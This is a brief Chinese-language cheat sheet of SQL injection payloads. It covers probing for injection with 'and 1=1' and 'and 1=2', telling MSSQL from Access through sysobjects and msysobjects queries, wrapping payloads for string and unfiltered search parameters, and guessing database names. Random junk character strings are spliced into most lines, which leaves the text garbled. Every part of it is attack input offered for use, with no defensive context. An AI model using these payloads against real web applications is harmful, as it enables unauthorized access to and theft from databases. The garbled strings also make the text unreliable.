1.判断是否有注入;and 1=1 ;and 1=2 saVX2j6Y
2.初步判断是否是mssql ;and user>0 hGU 3DKHT
XiAflO
3.注入参数是字符'and [查询条件] and ''=' SBamgc
:hDv^D?3
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 71,GrUV:
rnM C[
5.判断数据库系统 O5A]{W
Z#s-(wf
;and (select count(*) from sysobjects)>0 mssql rh6 e
X6n8Bi9Ik
;and (select count(*) from msysobjects)>0 access K,@} 'N
C@@PLsMg
D1Q]Z63,
\r-v]]_<d
6.猜数据库 ;and (select Count(*) from [数据库名])>0 :<,tGYg/!
.!_^<